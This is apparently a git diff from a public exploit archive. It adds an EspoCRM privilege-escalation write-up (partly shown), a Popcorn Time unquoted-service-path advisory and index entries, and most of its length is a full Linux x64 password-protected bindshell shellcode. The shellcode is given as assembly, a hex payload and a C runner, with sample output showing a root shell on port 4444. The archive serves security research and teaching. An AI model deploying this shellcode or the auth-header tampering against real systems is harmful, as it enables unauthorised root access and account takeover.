+Espo-Authorization: ************************************* +Espo-Authorization-By-Token: true +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: auth-token-secret=cdc7f7*********************377; +auth-username=user1; auth-token=3a874a********************************48 +---- + +2- When we decode Basic Authorization and Espo-Authorization and change the +value with another username (like admin) in the first request, we can see +other user information and access like BOSS +---------- + +3- Some Examples and encode technique + +- BASE64: +First type: dXNlcjE6MQ== (user1:1) +Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass) \ No newline at end of file diff --git a/exploits/windows/local/48378.txt b/exploits/windows/local/48378.txt new file mode 100644 index 000000000..68c3eb333 --- /dev/null +++ b/exploits/windows/local/48378.txt @@ -0,0 +1,37 @@ +# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path +# Date: 2020-04-24 +# Vendor Homepage: https://getpopcorntime.is +# Exploit Authors: Uriel Yochpaz & Jonatan Schor +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 6.2.1.14 and probably prior versions +# Tested on: Windows 10, 7 +# CVE : N/A + +[+] Description: +Popcorn Time For Windows installs as a service with an unquoted +service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +[+] POC: +C:\Users\User>sc qc "Update service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Update service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Update service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +[+] Exploit: +A successful attempt would require the local user to be able to insert their +code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) +folders undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5b809e378..b1b0f9065 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11038,6 +11038,7 @@ id,file,description,date,author,type,platform,port 48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows, 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows, +48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42611,3 +42612,6 @@ id,file,description,date,author,type,platform,port 48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, 48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, +48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple, +48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware, +48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index f62afe4be..e6ca9e5cc 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1020,3 +1020,4 @@ id,file,description,date,author,type,platform 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows +48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux diff --git a/shellcodes/linux/48379.c b/shellcodes/linux/48379.c new file mode 100644 index 000000000..72e38e10d --- /dev/null +++ b/shellcodes/linux/48379.c @@ -0,0 +1,194 @@ +## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) +## Exploit Author: Bobby Cooke +## Date: 2020-04-23 +## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1 +## SLAE/Student ID: PA-10913 +## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com. +## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client. +## Example: +# user$ nc 127.0.0.1 4444 +# M@G1C WOrDz IZ??asd +# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ +# id +# uid=0(root) gid=0(root) groups=0(root) + +; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); +; rax = 0x29 ; rdi = 0x2 = AF_INET +; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP +xor rsi, rsi ; clear rsi +mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP +add al, 0x29 ; rax = 0x29 = socket syscall +inc rsi ; rsi = 0x1 = SOCK_STREAM +push rsi +pop rdi ; rdi = 0x1 +inc rdi ; rdi = 0x2 = AF_INET +syscall ; socket syscall ; RAX returns socket File-Descriptor + +; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr)); +; rax = 0x31 ; rdi = 0x3 = ipv4Socket +; rsi = &ipSocketAddr ; rdi = 0x10 +; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00 +; Address-Family| PORT| IP Address| 8 bytes of zeros +xchg rdi, rax ; RDI = sockfd / ipv4Socket +xor rax, rax +add al, 0x31 ; rax = 0x31 = socket syscall +push rdx ; 8 bytes of zeros for second half of struct +push dx ; 4 bytes of zeros for IPADDR_ANY +push dx ; 4 bytes of zeros for IPADDR_ANY +push word 0x5c11 ; push 2 bytes for TCP Port 4444 +inc rdx +inc rdx ; rdx = 0x2 ; dx = 0x0002 +push dx ; 0x2 = AF_INET +add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr) +mov rsi, rsp ; rsi = &ipSocketAddr +syscall + +; int listen(int sockfd, int backlog); +; rax = 0x32 = listen syscall +; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0 +xor rax, rax +add al, 0x32 ; listen syscall +xor rsi, rsi ; backlog = 0x0 +syscall + +;accept +; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket +; rsi = 0x0 ; rdx = 0x0 +xor rax, rax +push rax +push rax +pop rdx +pop rsi +add al, 0x2b ; accept syscall +syscall ; accept returns client socket file-descriptor in RAX + +; dup2 +xchg rdi, rax ; RDI = sockfd / ClientSocketFD +xor rsi, rsi +add dl, 0x3 ; Loop Counter +dup2Loop: +xor rax, rax +add al, 0x21 ; RAX = 0x21 = dup2 systemcall +syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR +inc rsi +cmp rsi, rdx ; if 2-STDERR, end loop +jne dup2Loop + +jmp short password + +failer: +; write +; rax = 0x1 ; rdi = fd = 0x1 STDOUT +; rsi = &String ; rdx = sizeof(String) +; String = "REALLY?!" +; !?YLLAER : 213f594c4c414552 +xor rdi, rdi +mul rdi +push rdi +pop rsi +push rsi +mov rsi, 0x213f594c4c414552 +push rsi +mov rsi, rsp ; rsi = &String +inc rax ; rax = 0x1 = write system call +mov rdi, rax +add rdx, 16 ; 16 bytes / size of string +syscall + +password: +; write +; rax = 0x1 ; rdi = fd = 0x1 STDOUT +; rsi = &String ; rdx = sizeof(String) +; String = "M@G1C WOrDz IZ??" +; ??ZI zDr : 3f3f5a49207a4472 +; OW C1G@M : 4f5720433147404d +xor rdi, rdi +mul rdi +push rdi +pop rsi +push rsi +mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr +push rsi +mov rsi, 0x4f5720433147404d ; OW C1G@M +push rsi +mov rsi, rsp ; rsi = &String +inc rax ; rax = 0x1 = write system call +mov rdi, rax +add rdx, 16 ; 16 bytes / size of string +syscall + +; read +; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN +; rsi = Write to &String ; rdx = 0x12 = sizeof(String) +xor rdi, rdi +push rdi +mul rdi ; rdx =0x0 ; rax = 0x0 = write system call +mov rsi, rsp ; rsi = [RSP] = &String +add rdx, 12 ; 12 bytes / size of password +syscall + +; String = P3WP3Wl4ZerZ +; ZreZ : 5a72655a +; 4lW3PW3P : 346c573350573350 +mov rdi, rsp +xor rsi, rsi +add rsi, 0x5a72655a +push rsi +mov rsi, 0x346c573350573350 +push rsi +mov rsi, rsp ; rsi = &String +xor rcx, rcx +add rcx, 0xB +repe cmpsb +jnz failer + +;execve +; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00 +; rsi = 0x0 ; rdx = 0x0 +; "/bin/bash" +; h : 68 +; sab/nib/ : 7361622f6e69622f +xor rsi, rsi +mul rsi ; rdx&rax= 0x0 +xor rdi, rdi +push rdi +add rdx, 0x68 ; "h" +push rdx +mov rdx, 0x7361622f6e69622f ; "/bin/bas" +push rdx +xor rdx, rdx +mov rdi, rsp +mov al, 0x3b ; execve syscall +syscall ; call execve("/bin/bash", NULL, NULL) + +################################################################################ + +// Filename: shellcode.c +// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode +#include +#include + +unsigned char shellcode[] = \ +"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7" +"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68" +"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6" +"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50" +"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48" +"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23" +"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c" +"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2" +"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44" +"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57" +"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f" +"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f" +"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48" +"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9" +"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48" +"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69" +"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05"; +int main() +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file
System Command: